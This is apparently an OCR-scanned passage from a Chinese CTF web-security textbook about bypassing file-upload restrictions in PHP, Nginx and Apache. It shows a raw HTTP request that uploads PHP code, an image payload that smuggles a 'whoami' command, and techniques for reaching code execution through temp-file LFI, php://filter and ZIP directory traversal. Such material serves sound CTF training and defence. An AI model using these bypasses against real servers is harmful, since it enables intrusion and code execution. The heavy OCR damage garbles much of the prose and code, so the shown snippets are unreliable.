由 于 pathinfo 在 各 大 框架 的 流行 ， 很 多 计算 机 支持 pathinfo， 会 把 location 类 似 x.php/xxxx 的 路 径 也 
交 给 FPM 解 析 ， 但 是 x.php/xxx 并 不 符合 deny all 的 匹配 规则 ， 导 致 绕 过 ， 见 图 2-4-32。 
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图 2-4-32 
2. location 匹 配 顺 序 导 致 的 绕 过 问题 


在 Nginx 配 置 中 经 常 出 现 多 个 location 都 能 匹配 请 求 URI 的 场景 ， 这 时 有 具体 交 给 哪个 location 语 句 块 处 
理 ， 就 需要 看 location 块 的 匹配 优先 级 。Nginx 配 置 如 下 : 


location /book/upload/ { 
deny all; 
} 
Location ~ \.phpC/|$) { 
#try_files $uri =404; 
fastcgi_pass 
unix:/Applications/MAMP/Library/logs/fastcgi/nginxFastCGI_php5.4.45.sock; 
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; 
include /Applications/MAMP/conf/nginx/fastcgi_params; 


Nginx 的 location 块 匹配 优先 级 为 先 匹 配 普通 location ， 再 匹配 正则 location。 ER 
都 匹配 URI， 则 会 按照 最 长 前 缀 原则 选择 location。 在 普通 location 匹 配 完成 后 ， 如 果 不 是 完全 匹 

配 ， 那 么 并 不 会 结束 ， 而 是 继续 交 给 正则 location 检 测 ， 如 果 正 则 匹配 成 功 ， 就 会 覆盖 普通 location 

匹配 的 结果 。 所 以 在 以 上 配置 中 ，deny all 被 正则 location 匹 配 所 覆盖 ，upload 目 录 下 的 PHP 文 件 依 


旧 能 够 正常 执行 ， 见 图 2-4-33。 


图 2-4-33 


J 正确 的 配置 方法 应 该 在 普通 匹配 前 加 上 “人 ^ ~”， 表 示 只 要 该 普通 匹配 成 功 ， 束 算 不 是 完全 匹配 也 不 
再 进行 正则 匹配 ， 所 以 在 该 配置 下 能 够 成 功 禁 止 PHP 文 件 的 解析 ， 见 图 2-4-34.。 


location ~ \.php$ { 
#try_files $uri =404; 
fastcgi_pass 
unix:/Applications/MAMP/Library/logs/fastcgi/nginxFastCGI_php5.4.45.sock; 
fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; 
include /Applications/MAMP/conf/nginx/fastcgi_params; 
} 
location ~ /book/upload/ { 
deny all; 


$ 


图 2-4-34 


以 上 配置 与 普通 匹配 不 同 ， 正 则 location 只 要 匹配 成 功 ， 融 不 再 考虑 后 面 的 location 块 。 正史 机 
ocation 
匹配 顺序 与 在 配置 文件 中 的 物理 顺序 有 关 ， 物 理 顺 序 在 前 的 会 先进 行 匹 配 。 所 以 在 以 上 的 配置 中 ， 
两 个 匹配 都 为 正则 匹配 ， 那 么 按照 匹配 顺序 upload 目 录 下 的 PHP 文 件 依旧 会 交 给 FPM 解 析 ， 见 图 2-4 


二 


图 2-4-35 


3. 利用 Apache 解 析 漏洞 绕 过 


<Directory "/Applications/MAMP/htdocs/book/upload/"> 
<FilesMatch ".(phplphpS|phtml)$"> 
Deny from all 
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</FilesMatch> 
</Directory> 


Apache 通 常 使 用 以 上 配置 禁止 上 传 目 录 中 的 脚本 文件 被 访问 ， 此 时 可 以 利用 Apache 的 解析 漏洞 上 传 
yu.php.aaa 文 件 ， 使 其 不 符合 deny all 的 匹配 规则 实现 绕 过 ， 见 图 2-4-36。 


图 2-4-36 


2.4.6 绕 过 图 片 验证 实现 代码 执行 
部 分 开发 者 认为 ， 上 传 文件 的 内 容 如 果 是 一 张 正常 的 图 片 就 不 可 能 再 执行 代码 ， 所 以 允许 任意 后 缀 广 
件 上 传 ， 但 是 在 PHP 中 ， 检 测 文件 是 否 为 正常 图 片 的 方法 往往 能 被 绕 过 


1. getimagesize 绕 过 


getimagesize 函 数 用 来 测定 任何 图 像 文件 的 大 小 并 返回 图 像 的 太吉 以 及 文件 类 型 ， 如 果 文 件 不 是 有 效 
的 图 像 文件 ， 则 将 返回 FALSE 并 产生 一 条 E_ WARNING 级 错误 ， 见 图 2-4-37。 


图 2-4-37 
尝试 直接 上 传 PHP 文 件 失 败 ， 见 图 2-4-38。 


Geoko ) chrome/74. 0.3729.131 Safari/537.36 


Accept: 
text/html ,al ees set n/xhtml+xml ,application/xml;q=0.9, image/webp, image/apng,*/*;q=0.8,applicatio 
n/s signed-e 


xchange;v 
Cookie ebro igbe pre 38cad559ea401174871b 
age niqs=0.9,zh-CNiqs0.8, zhiq=0.7 
lose 


‘WebKitFormBound: arycOADQewH2U4BBaq2 
content Dispoottton n: form-data; name""file"”; filen x.jpg” 
Content-Type: image/jpeg 


<?php phpinfo();?> 
~-~--~WebKitFormBoundarycOADQewH2U4BBaq2-~ 


图 2-4-38 
getimagesize 的 绕 过 比较 简单 ， 只 要 将 PHP 代 码 添加 a 到 图 片 内 容 后 残 能 成 功 绕 过 ， 见 图 2-4-39， 此 
时 上 传 的 PHP 文 件 能 够 正常 解析 ， 见 图 2-4-40。 


O27 OrnOO OR OCIO OVU DO OO+: OROOD*xONO NO. OonO | Content Lyne: tex 
DOOOOOOFOIOO1 OI OOnN OOO YsF :OO -0] 7 OOO OF OP 


DVPOOO; OIOL ONONO XOIOLOOOIOO OO74YiFOOOFYyO); 


60106600 00000051 00100 1E O01000 
从 人 A4r 2 
9Aads ©d E OOOQX es gO<O? OniOW 
OOOO OOOOCO Oss nd OO 0200, dOv' OF 9 
Yoon NA 人 O0100 
ss 


OOOVOOS A 3O0MOOOOO0O0OOOOOIOO00 
OO OIO -O00 0000r?7O 
‘OG 4 |o@sE 
< phpinfo();?> 
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图 2-4-40 

同时 ，getimagesize 文 持 测 定 XBM 格 式 图 片 一 一 一 种 纯 文本 图 片 格 式 。getimagesize 在 测定 XBM 时 

ee | 
和 width 不 为 空 ， 那 么 getimagesize 就 会 测定 成 功 。 因 为 是 逐 行 读 取 ， 所 以 height 和 width 可 以 

放 到 任意 一 行 . 


while ((fline=php_stream_gets(stream, NULL, 0)) != NULL) { 
if (sscanf(fline, "#define %s %d", iname, &value) == 2) { 
if (!(type = strrchr(iname, '_'))) { 
type = iname; 
} 
else { 
typet+; 
} 
if (!stremp("width", type)) { 
width = (unsigned int) value; 


} 
if (!stremp("height", type)) { 
height = (unsigned int) value; 


} 
if (width && height) { 
return IMAGE_FILETYPE_XBM; 


使 用 XBM 可 以 通过 getimagesize 验 证 并 且 同 时 利用 imagemagick。 


push graphic-context 

viewbox 9 9 640 489 

fill 'urLChttps://exampLe.com/image.jpg"|whoami ") 
pop graphic-context 

#define height 100 

#define width 1100 


2. imagecreatefromjpeg 绕 过 


imagecreatefromjpeg 方 法 会 泻 染 图 像 生成 新 的 图 像 ， 在 图 像 中 注入 脚本 代码 经 过 泻 染 后 ， 脚 本 代码 


会 消失 ， 不 过 该 方法 也 已 经 存在 成 熟 的 绕 过 脚本 : https://github.com/BlackFan/jpg_payload。 测 
试 代 码 见 图 2-4-41。 


$_FILES[ 


1Deg(t Lmagecreat: 
图 2-4-41 


绕 过 需要 先 上 传 正 常 图 片 文件 ， 再 下 载 回 泻 染 后 的 图 片 ， 运 行 jpg9_payload.php 处 理 下 载 回来 的 图 
片 ， 将 代码 注入 图 片 文件 ， 然 后 上 传 新 生成 的 图 片 ， 能 看 出 经 过 imagecreatefromjpeg 后 注入 的 脚本 
代码 依然 存在 ， 见 图 2-4-42。 


图 2-4-42 
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PHP 在 上 传 文件 过 程 中 会 生成 临时 文件 ， 在 上 传 完成 后 会 删除 临时 文件 。 在 存在 包含 漏洞 却 找 不 到 上 
传 功能 目 无 文件 可 包含 有 时， 可 以 尝试 包含 上 传 生 成 的 临时 文件 配合 利用 。 


图 2-4-42 


1. LFI via phpinfo 


由 于 上 传 生 成 的 临时 文件 的 文件 名 存在 6 位 随机 字符 ， 并 且 在 上 传 完成 后 会 删除 该 文件 ， 因 此 在 有 限 
的 时 间 内 找到 临时 文件 名 是 一 个 很 大 的 问题 。 不 过 phpinfo 中 会 输出 当前 环境 下 的 所 有 变量 ， 如 果 存 
在 $ FILES 变 量 ， 也 会 输出 ， 所 以 如 果 目 标 存在 phpinfo 文 件 ， 往 phpinfo 上 传 一 个 文件 ， 就 可 以 轻松 
拿 天 tmp_name， 见 图 2-4-43。LFI 配 合 phpinfo 场 景 已 经 存在 成 熟 的 利用 脚本 了 ， 这 里 不 再 玲 述 


_FILES["upload"] 


图 2-4-43 


2. LFI via Upload Progress 


当 session.upload progress.enabled 选 项 开启 时 ，PHP 能 在 每 个 文件 上 传 时 监测 上 传 进度 。 从 PHP 
5.4 起 ， 该 配置 可 用 且 默 认 开 局 。 当 上 传 文件 时 ， 同 时 POST 与 INI 中 设置 的 session.upload_progress. 
name 同 名 变量 ，PHP 检 测 到 这 种 POST 请 求 时 ， 会 往 Session 中 添加 一 组 数据 ， 写 入 上 传 进度 等 信 
息 ， 其 索引 为 session.upload progress.prefix 与 $ POST[session.upload progress.namel] 值 连接 
在 一 起 的 值 。session.upload progress.prefix 默 认为 upload progress ，session.upload 
.name 默 认为 php_session upload progress， 所 以 上 传 时 需要 POST php session oe 
这 时 上 传 文件 名 会 写 入 SESSION，PHPSESSION 默 认 以 文件 保存 ， 进 而 可 以 配合 LFI， 见 赔 2-” 


4-44. 
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图 2-4-44 
由 于 session.upload progress.cleanup 配 置 默 认为 ON， 即 在 读 取 完 POST 数 据 后 会 清除 upload 
所 添加 的 Session， 因 此 这 里 需要 用 到 条 件 竞 争 ， 在 Session 文 件 被 清除 前 包含 到 Session 文 人 
最 终 实现 代码 执行 。 条 件 竞 争 结果 见 图 2-4-425。 














Host: 127 

Upgrade-Insecure-Requests: 1 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10 14 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729 
Accept: text/html ,application/xhtml*xml ,application/xml;q=0.9,image/webp, image/apng,*/*;q=0.8,application/signed-ex 
Accept-Language: en-US,en;q"0.9,zh-CN;q"0.8,zh;qg"0.7 

Connection: close 


图 2-4-45 


3. LFI via Segmentation fault 


Segmentation fault 方 法 实现 思路 为 ， 向 出 现 Segmentation fault 异 常 的 地 址 上 传 文件 ， 导 致 在 垃圾 
回收 前 异常 退出 ， 上 传 生 成 的 临时 文件 束 不 会 被 删除 ， 最 后 通过 大 量 上 传 文件 同时 枚 举 临 时 文件 名 的 
所 有 可 能 ,最 终 实 现 LFI 的 利用 ， 见 图 2-4-44。 在 PHP 7 中 ， 如 果 用 户 可 以 控制 fle 孙 数 的 参数 ， 即 可 
产生 Segmentation fault。 人 至 于 Segfault 形 成 原因 ， 可 以 直接 看 Nu1l 战 队 队 员 wupco 的 分 析 : ea 
://hackmd.io/s/Hk-2nUb3Q。 


2.4.8 使 用 file put contents 实 现 文件 上 传 


除了 使 用 FILES 实 现 上 传 ， 在 测试 中 也 会 遇 到 另 一 种 上 传 格式 ， 这 种 方法 通 单 在 获取 到 文件 内 容 后 使 
用 file_put_contents 等 万 法 实现 文件 上 传 ， 见 图 2-4-46。 
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图 2-4-46 
1. file put contents 上 传 文 件 黑 名 单 绕 过 


在 文件 名 可 控 场 景 下 ，FILES 上 传 中 即使 开 友 者 没有 过 滤 “/./” 字 符 ，PHP 在 注册 FILEs[ name] 变 量 

时 也 会 自身 做 basename 处 理 ， 导 致 用 户 不 能 传 入 “/../” 等 字符 。 在 flle_put_contents 方 法 中 ， 文 

件 地 址 参数 可 能 为 绝对 路 径 ， 所 以 PHP 肯 定 不 会 对 该 参数 做 basename 处 理 ， 在 文件 名 可 控 情 况 下 ， 人 
_put_contents 上 传 文件 能 够 实现 目录 穿越 。 


当 图 2-4-47 所 示 代 码 出 现在 Nginx+PHP 环 境 且 upload 目 录 下 无 可 执行 文件 时 ， 需 要 找到 其 他 方法 绕 
过 黑 名 单 。file put contents 的 文件 名 为 “yu.php/.” 时 ， 能 够 正常 写 入 yu.php 文 件 ， 并 且 代 码 获 
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取 的 后 缀 为 空 字符 串 ， 所 以 能 够 绕 过 黑 名 单 ， 见 图 2-4-48。 


图 2-4-47 


LU I Sy Ue SS WN a 


图 2-4-48 
当 用 file put contents 时 ，zend virtual cwd.c 的 virtual file ex 方法 中 调用 tsrm realpath r 方 法 标 
准 化 路 径 。file_put_contents 方 法 的 部 分 调用 枝 如 下 。 


virtual_file_ex zend_virtual_cwd.c:1390 
expand_filepath_with_mode fopen_wrappers.c:820 
expand_filepath_ex fopen_wrappers.c:758 
expand_filepath fopen_wrappers.c:750 
_php_stream_fopen plain_wrapper.c:994 
php_plain_files_stream_opener plain_wrapper.c:1080 
_php_stream_open_wrapper_ex streams.c:2055 
zif_file_put_contents file.c:610 


在 tsrm_realpath_r 方 法 中 添加 如 下 代码 : 


while (1) { 
if (len <= start) { 
EUinkais dir dt 
xLink_is_dir = 1; 


; 


return start; 
} 


i = Len; 

while (i > start && !IS_SLASH(path[i-1])) { 
1 

} 


if (i == len || (i == len - 1 && path[i] == '.')) { 
/* remove double slashes and '.' */ 
len=i-1; 
is dir = 1; 
continue; 
} 
else if (i == Len - 2 && path[i] == '.' && path[i+1] == '.') { 
/* remove '..' and previous directory */ 
ids-dir = 1: 
if (link_is_dir) { 
*lLink_is_dir = 1; 
} 
} 
path[Len] = 90; 


在 该 方法 中 ， 如 果 路 径 以 “/” 结尾 ， 融 会 把 len 定 义 为 “/” 字 待 的 系 引 ， 然 后 执行 : 


截断 挥 “/.” 字 符 ， 处 理 成 正常 的 路 径 。 不 过 这 种 方法 只 能 新 建文 件 ， 在 窗 蘑 一 个 存在 的 文件 时 会 出 
现 错误 ， 见 图 2-4-49。 
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图 2-4-49 
同样 ， 在 tsrm_realpath r 方 法 中 存在 以 下 代码 : 


save = (use_realpath != CWD_EXPAND); 


if (save && php_sys_lstat(path, &st) < 0) { 
if (use_realpath == CWD_REALPATH) { /* file not found */ 
return -1; 
/* continue resolution anyway but don't save result in the cache */ 
save = 0; 
} 
} 


php_sys_lstat 为 Istat 方 法 的 宏 定义 ，1stat 方 法 用 于 获取 文件 的 信息 ， 执 行 失败 则 返回 -1， 执 行 成 功 则 
返回 0。 所 以 当 文 件 不 存在 时 ，lstat 返 回 -1， 进 入 if 语句 块 ，save 变 量 被 重 置 为 0， 文 件 存在 时 |stat 返 
回 0， 不 进入 i 语句 块 ，save 变 量 依 上 日 为 1。 


当 save 变 量 为 1 时 ， 进 入 以 下 语句 块 : 


if (save) { 
directory = S_ISDIR(st.st_mode); 
if (link_is_dir) { 
x*Link_is_dir = directory; 
} 
if (is_dir && !directory) { 
free_alloca(tmp, use_heap); 
return -1; 
} 
} 


在 最 初 判断 路 径 示 尾 为 “/.” 后 ，is_dir 被 赋值 为 1。 不 过 在 截断 “/.” 字 符 后 lstat 获 取 的 路 径 信 息 不 由 
是 目录 而 是 文件 ， 即 directory 为 0。is_dir 和 directory 两 者 不 相同 的 情况 下 会 返回 -1。 


path_Length = tsrm_realpath_r(resolved_path, start, path_length, &ll, &t, use_realpath, 09, NULL); 
if (path_length < 06) { 

errno = ENOENT; 

return 1; 


1 


当 返 回 值 为 -1 时 ， 定 义 错误 号 码 ， 最 终 写 文件 失败 。 
2. 死亡 之 die 绕 过 


很 多 网 站 会 把 Log 或 缓 仓 直 接 写 入 PHP 文 件 ， 为 了 防止 日 志 或 缓存 文件 执行 代码 ， 会 在 文件 开头 加 入 
<? php exit0; ?>。 人 在 图 2-4-50 代 码 中 ， 用 户 可 以 完全 控制 fename， 包 括 协 议 。 


图 2-4-50 
在 官方 手册 ( 见 https://www.php.net/manual/zh/yfilters.string.php) 中 可 以 友 现存 在 许多 过 渡 
器 ， 所 以 这 里 可 以 使 用 一 些 字符 串 过 滤器 把 exit() 处 理 掉 ， 从 而 让 后 面 写 入 的 代码 能 够 被 执行 ， 可 以 使 
用 base64 decode 进 行 处 理 。 
Pier entstring rphp aseer. teeote-exCeonst insigred oar vate, sleet rgth, ent. perl atric 


int ch, i = 06, j = 0, padding = 0; 
zend_string *result; 


result = zend_string_alloc(length, 0); 
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while (Length-- > 90) { /* run through the whole string, converting as we go */ 
ch = x*current++; 
if (ch == base6y_pad) { 
padding++; 
continue; 
} 
ch = base64_reverse_tabLe[ch] ; 
if (!strict) { /* skip unknown characters and whitespace */ 
if (ch < 90) { 
continue; 
} 
上 


PHP 的 base64 decode 方 法 默认 非 严 格 模式 ， 除 了 跳 过 填充 字符 “=” ， 如 果 存 在 字符 使 得 base64 


reverse table[ch] <0， 也 会 跳 过 。 


static const short base64_reverse_tabLe[256] = { 

-2 -2, -2,. -2 -2,. -2 -2 -2, -2, -1, -1, 
= = = 
-1, -2, =2， 
32, 56, -2 
-2 第 

15, 9 25, 
-2, 29, 35, 
41, 45， 51, 
= -2 一 之 ， 
-2, -2， -2, 
dd = = 
-2， -2， -2， 
= 之 ， =2， = 一 之 ， 
一 点 。 -= =， 
下 一 长 -= 
=2, =2，, =2， 


从 base64 reverse table 中 可 以 发 现 ， 只 有 当 字 符 的 ASCIl 值 为 43、47~ 57、65~ 90、97~ 122 
时 ， 才 有 base64_reverse table[ch]>=0， 对 应 的 字符 为 +、/、0 ~ 9、a ~z、A~Z， 其 余 字 符 都 会 
被 跳 过 。“<? php exit(); ? >\n” 除 去 了 被 跳 过 的 字符 ,剩余 phpexit， 在 base64 解 码 时 每 4 字 节 
一 组 ， 所 以 需要 再 填 序 1 字 节 ， 最 终 被 解码 为 乱码 后 面 的 代码 融 能 正音 执行 ， 见 图 2-4-51。 





四 


2.4.9 ZIP 上 传 市 来 的 上 传 问题 


为 了 实现 批量 上 传 ， 很 多 系统 支持 上 传 ZIP 压 缩 包 ， 表 在 后 端 解压 ZIP 文 件 ， 如 果 疫 有 对 解压 出 来 的 文 
件 做 好 处 理 ， 就 会 导致 安全 问题 ， 以 前 PHPCMS 就 出 现 过 未 处 理 好 上 传 的 ZIP 导 致 的 安全 问题 。 


1. 未 处 理解 压 文件 


图 2-4-52 中 的 代码 仅 在 上 传 时 限制 文件 后 缀 必须 为 zip， 但 是 没有 对 解压 的 文件 做 任何 处 理 ， 所 所 
文件 压缩 为 ZIP 文 件 ， 表 上传 ZIP 文 件 ， 后 端 解 压 后 实现 任意 文件 上 传 ， 见 图 2-4-53。 
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图 2-4-52 








鲜 2-4-53 
2. 未 递归 检测 上 传 目 录 导 致 绕 过 


为 了 解决 解压 文件 市 来 的 安全 问题 ,很 多 程序 会 在 解压 完 ZIP 后 ， 检 测 上 传 目 录 下 是 人 否 存在 脚本 文 
件 ， 如 果 存 在， 则 删除 。 


例如 ， 图 2-4-54 中 的 代码 在 解压 完成 后 ， 会 通过 readdir 获 取 上 传 目录 下 的 所 有 文件 、 目 录 ， 如 果 发 
现 后 缀 不 是 jpg、gif、png 的 文件 ， 则 删除 。 但 是 以 上 代码 仅仅 检测 了 上 传 目录 ， 没 有 递归 检测 上 传 
目录 下 的 所 有 目录 ， 所 以 如 果 解 压 出 一 个 目录 ， 那 么 目录 下 的 文件 不 会 被 检测 到 。 昌 然 hello 目 录 的 后 
缀 个 在 日 名 单列 表 中 ， 但 是 unlink 一 个 目录 不 会 成 功 ， 仪 会 抛 出 warning， 所 以 目录 和 目录 下 的 文件 
器 补 保留 了 ， 见 图 2-4-55。 








图 2-4-54 





国 区 EE 
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图 2-4-56 


3 .条件 竞争 导致 绕 过 


在 图 2-4-57 所 示 的 代码 中 ,递归 检测 了 上 传 目录 下 的 所 有 目录 ， 所 以 之 前 的 绕 过 万 式 不 天 可 行 。 





图 2-4-57 
这 种 场景 下 可 以 通过 条 件 竞争 的 万 式 绕 过 ， 即 在 文件 被 删除 前 访问 文件 ， 生 成 男 一 个 脚本 文件 到 非 上 
传 目录 中 ， 见 图 2-4-58 和 图 2-4-59。 





图 2-4-58 


EE 四 





JO00000000000 
JO00000000000 


图 2-4-59 


通过 不 断 上 传 文件 与 访问 文件 ， 在 文件 被 删除 前 访问 到 了 文件 ， 最 终生 成 脚本 文件 到 其 他 目录 中 实现 
绕 过 ， 见 图 2-4-60。 
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¢ 
D 


图 2-4-60 
4. 解压 产生 异常 退出 实现 绕 过 


为 了 避免 条 件 竞 争 问题 ， 图 2-4-61 中 的 代码 把 文件 解压 到 了 一 个 随机 目录 中 ， 由 于 目录 名 不 可 预测 ， 

因此 不 再 能 够 进行 条 件 竞 争 。ZipArchive 对 象 中 的 extractTo 广 法 在 解压 失败 时 会 返回 false， 很 多 程 

序 在 解压 失败 后 会 立即 退出 程序 ， 但 是 其 实 可 以 构造 出 一 种 解压 到 一 半 然 后 解压 失败 的 ZIP 包 。 合用， 
Editor 修 改 生成 的 ZIP 包 ， 将 2.php 后 的 内 容 修改 为 0xff 然 后 保 仓 生成 的 新 ZIP 文 件 ， 见 图 2-4-62。 


由 于 解压 失败 ， 在 check_dir 方 法 前 执行 了 exit， 已 解压 出 的 脚本 文件 束 不 会 被 删除 。 这 时 再 枚 举目 录 
的 所 有 可 能 ， 最 终 跑 到 脚本 文件 ， 见 图 2-4-63。 


5. 解压 特殊 文件 实现 绕 过 
为 了 修复 异 弟 退 出 导致 的 绕 过 ， 将 代码 修改 为 以 下 代码 ， 在 解压 失败 后 也 会 调用 check_dir 万 法 删除 
目录 下 的 非法 文件 ， 所 以 这 时 使 用 异常 退出 方法 也 不 再 可 行 。 


if($zip->extractTo($dir.$temp_dir) === false) { 
check_dir($dir); 
exit(' 解 压 失败 '); 








图 2-4-61 


0050h: 20 57 6F 72 6C 64 27 3B 3F 3E OA 50 4B 03 04 07 
0 00 00 00 00 6E 96 A A4E EA D8 30 1 1C 00 00 
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9fl6b57bdd4400066a83cd8...1200 | 
404 
a9b7ba70783b617e9998dc... 404 
b8c37e33defdeSlcf9lele03... 404 
fba9d88164f3e2d9109ee77... 404 
fed33392d3a48aal49a87a3... 404 
2387337bale0b0249ba90f5... 
aa68c75c4a77c87f97fb686b... 
d7322ed717dedfleb4e6e52... 
31b3b31alc2f8a370206f11... 
1587965fb4d4b5afe8428a4... 
9246444d94f081e3549803... 
f33balSeffaScl0e873bf384... 
7f975a56c761db6506eca0b... 
1aARcAAINhTINT2he T1016e 


OO 


DEOOOOOOOOO000 O00 
dolele[elelelnlelnlelele 


12 May 2019 11:19:2]1 GMT 
Server: Apache 
X-Powered-By: PHP/S5.4.45 
Connection: close 
Content-Type: text/html 
Content-Length: 11 


图 2-4-63 
在 以 上 场景 中 ， 如 果 在 解压 ZIP 文 件 时 能 够 让 解压 出 的 文件 名 含有 “../” 字 符 实 现 目录 穿越 跳出 上 传 
目录 ， 那 么 解压 出 的 脚本 文件 不 会 裤 check _ dir 删除 。PHP 解 压 ZIP 文 件 有 两 种 单 用 方法 ， 一 种 是 PHP 
目 市 的 扩展 ZipArchive， 另 一 种 是 第 三 方 的 PclZip。 


首先 测试 ZipArchive， 构造 一 个 含有 “../” 字 符 的 压缩 包 ， 生 成 一 个 正常 压缩 包 ， 然 后 使 用 010 
eaqlitor 
修改 压缩 包 文 件 ， 见 图 2-4-64。 


Template Results - ZIP.bt 
Name 


Ushort deVersionMadeBy 798 

Ushort deVersionToExtract 10 

Ushort deFlags 0 

enum COMPTYPE deCompression COMP_STORED (0) 
DOSTIME deFileTime 20:59:50 
DOSDATE deFileDate 05/13/2019 
uint deCrc 1E30D8EAh 
uint deCompressedSize 

uint deUncompressedSize 

ushort deFileNameLength 

ushort deExtraFieldLength 

ushort deFileCommentLength 

ushort deDiskNumberStart 

ushort delnternalAttributes 

uint deExternalAttributes 2175008768 


../../aaaaaaa.lpg 


# struct ZIPENDLOCATOR endLocator 


图 2-4-64 
上 传 该 ZIP 文 件 后 ， 解 压 出 的 文件 依旧 在 随机 目录 下 ， 没 有 实现 目录 穿越 ， 见 图 2-4-65。 


在 /ext/zip/php zip.c 文 件 中 ，ZIPARCHIVE METHOD (extractTo) 方法 调用 了 php zip_extract 


file 


万 法 来 解压 文件 。 


static ZIPARCHIVE_METHOD(extractTo) { 
struct zip x*intern; 


else { /* Extract all files */ 


图 2-4-65 
int filecount = zip_get_num_files(intern); 


if (filecount == -1) { 
php_error_docref(NULL, E_WARNING, "Illegal archive"), 
RETURN_FALSE ; 

} 


for (i = 0; i < filecount; i++) { 
char x*file = (char*)zip_get_name(intern, i, ZIP_FL_UNCHANGED); 
if (!file || !php_zip_extract_file(intern, pathto, file, strlen(file))) { 
RETURN_FALSE; 
} 
} 
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本 
} 


static int php_zip_extract_fiLe(struct zip * za, char x*dest, char x*file, int file_len) { 
php_stream_statbuf ssb; 
/* Clean/normlize the path and then transform any path (absolute or relative) 
to a path relative to cwd (../../mydir/foo.txt > mydir/foo.txt) 
*/ 
virtual_file_ex(&new_state, file, NULL, CWD_EXPAND); 
path_cleaned = php_zip_make_relative_path(new_state.cwd, new_state.cwd_length); 
if(!path_cleaned) { 
return 0; 
} 
} 


在 php zip extract file 方 法 中 ， 先 使 用 virtual file ex 对 路 径 规范 化 ， 从 注释 中 也 能 看 出 规范 化 后 的 
结果 ， 再 调用 php_zip_make _relative_path 将 路 径 处 理 为 相对 路 径 。 


例如 ， 压 缩 包 中 含有 /../aaaaaaaaa.php 文 件 ， 先 经 过 virtual file ex 方法 中 tsrm realpath r 处 理 后 ， 
变 为 /aaaaaaaaa.php， 再 经 过 php zip make relative_ path 处 理 ， 变 为 相对 路 径 aaaaaaaaa.php， 
因而 不 能 够 实现 目录 穿越 。 不 过 Windows 下 的 virtual file_ ex 和 Linux 处 理 不 同 ，Windows 中 不 会 使 
用 tsrm_realpath_r 方 法 处 理 路 径 ， 所 以 在 Windows 下 可 以 使 用 这 种 方法 ， 具 体 代码 可 查看 zend/ 
_Virtual cwd.c 文 件 。 。 


ie 


另 一 种 解压 ZIP 的 常用 方法 是 ，PclZip 没 有 规范 化 路 径 ， 所 以 可 以 实现 目录 穿越 。 a 


oo 


图 2-4-66 


function privDirCheck($p_dir, $p_is_dir=false) { 
$v_result = 1; 


// ----- Remove the final '/' 
if (($p_is_dir) && (substr($p_dir, -1)=='/')) { 
$p_dir = substr($p_dir, 0, strlen($p_dir)-1); 


Check the directory availability 
if ((is_dir($p_dir)) || ($p_dir == "")) { 
return 1; 


} 


// ----- Extract parent directory 
$p_parent_dir = dirname($p_dir); 
Just a check 

if ($p_parent_dir != $p_dir) { 

// ----- Look for parent directory 

if ($p_parent_dir != "") { 

if (($v_result = $this->privDirCheck($p_parent_dir)) != 1) { 
return $v_result; 


PclZip 构 造 压缩 包 时 ， 需 要 注意 包 内 的 第 一 个 文件 应 该 是 正常 文件， 如果 第 一 个 文件 是 目录 ， 那 么 穿 
越 文 件 在 Linux 下 利用 会 失败 。 主 要 原因 是 文件 写 入 临时 目录 时 ， 会 使 用 privDirCheck 方 法 判断 目录 
YE = 
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假设 生成 的 临时 目录 为 dd409260aea46a90e61b9a69fb9726ef， 压 缩 包 内 的 第 一 个 文件 为 /../../a. 
。 开 始 进 入 privDirCheck 目 录 检 测 、 创 建 流程 ， 由 于 dd409260aea46a90e61b9a69fb-9726ef 由 ; 
录 不 仔 人 在 ，Linux 下 不 存在 的 目录 不 能 穿越 ， 因 此 


方法 会 返回 false。 
privDirCheck 方 法 的 大 概 流程 如 下 。 


<1>is dir ('./upload/dd409260aea46a90e61b9a69fb9726ef/../.…) 返回 false， 获 取 父 目录 ./ 
upload/dd409260aea46a90e61b9a69fb9726ef/.， 调 用 privDirCheck 万 法 。 


三 
录 ./upload/dd409260aea46a90e61b9a69fb9726ef， 调 用 privDirCheck 方 法 


<3>is dir ('./upload/dd409260aea46a90e61b9a69fb9726ef ) 依然 到 回 false， 获 取 父 目录 ./ 
upload， 调 用 privDirCheck 方 法 。 


<4>is dir (./upload') 目录 存在， 返回 true， 然 后 开始 递归 创建 不 他 在 的 子 目录 。 


[ee 三 


<6>mkdir ('./upload/dd409260aea46a90e61b9a69fb9726ef/.. ) ， 目 录 穿 越 成 功 ， 实 际 执 
行 的 为 mkdir (./upload') 。 由 于 upload 目 录 已 趣 企 ， 则 出 现 错 误 ， 返 回 错误 编号 ， 最 终 从 压缩 包 
中 提取 文件 失败 。 


绪 上 ， 需 要 压缩 包 的 第 一 个 文件 是 正常 文件 ， 则 先 创 建 临 时 目录 ， 后 面 的 文件 目录 穿越 不 会 再 出 现 问 
= AAPA/ le lo A n= N= 


构造 一 个 含有 特殊 文件 的 压缩 包 进 行 上 传 ， 见 图 2-4-67， 最 终 实 现 了 利用 ， 见 图 2-4-68。 





图 2-4-68 
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小 结 


本 章 涉 及 的 Web 漏 洞 与 第 1 草 的 不 同 ， 漏 洞 涉及 的 “小 技巧 ”繁多 ， 如 XSS 漏 洞 中 的 CSP 绕 过 等 ， 
此 读者 需要 多 积 昧 经 验 ， 多 进行 相 天 漏洞 的 复 现 ， 才 才能 详细 了 解 漏洞 细节 ， 上 明日 触 帮 漏洞 所 需 的 条 
件 ， 在 比赛 过 程 中 快 人 一 步 。 


第 3 章 将 从 Web 常 见 的 语言 特性 和 比赛 中 出 现 次 数 较 少 的 漏洞 入 手 ， 需 要 读者 对 相关 语言 的 语法 或 华 
法 有 所 了 解 。 
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第 3 章 Web 拓 展 


前 两 章 主要 介绍 了 一 些 传统 的 Web 漏 洞 。 本 草 则 主要 从 PHP 和 Python 的 语言 特性 出 友 ， 介 绍 两 种 这 
流 Webi 语 言 企 CTF 比 赛 中 弟 出 现 的 漏洞 ， 即 反 序列 化 漏洞 与 Python 的 安全 问题 ， 同 时 介绍 密码 学 相 
大 的 Web 汤 洞 和 和 Web 远 辑 局 ; 洱 ， 让 读者 对 Web 万 向 的 漏洞 有 更 全 面 的 了 解 。 
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3.1 肥 序 刘 化 漏洞 


在 各 类 语言 中 ， 将 对 象 的 状态 信息 转换 为 可 存储 或 可 传输 的 过 程 就 是 序列 化 ， 序 列 化 的 逆 过 程 便 是 反 
